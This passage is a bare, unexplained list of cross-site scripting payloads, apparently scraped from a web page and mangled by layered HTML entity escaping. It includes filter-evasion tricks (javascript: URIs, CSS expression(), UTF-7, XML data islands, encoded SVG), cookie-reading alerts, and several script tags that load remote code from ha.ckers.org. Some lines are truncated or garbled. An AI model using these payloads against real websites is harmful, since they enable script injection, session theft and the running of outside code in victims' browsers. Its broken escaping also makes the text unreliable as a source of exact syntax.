&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
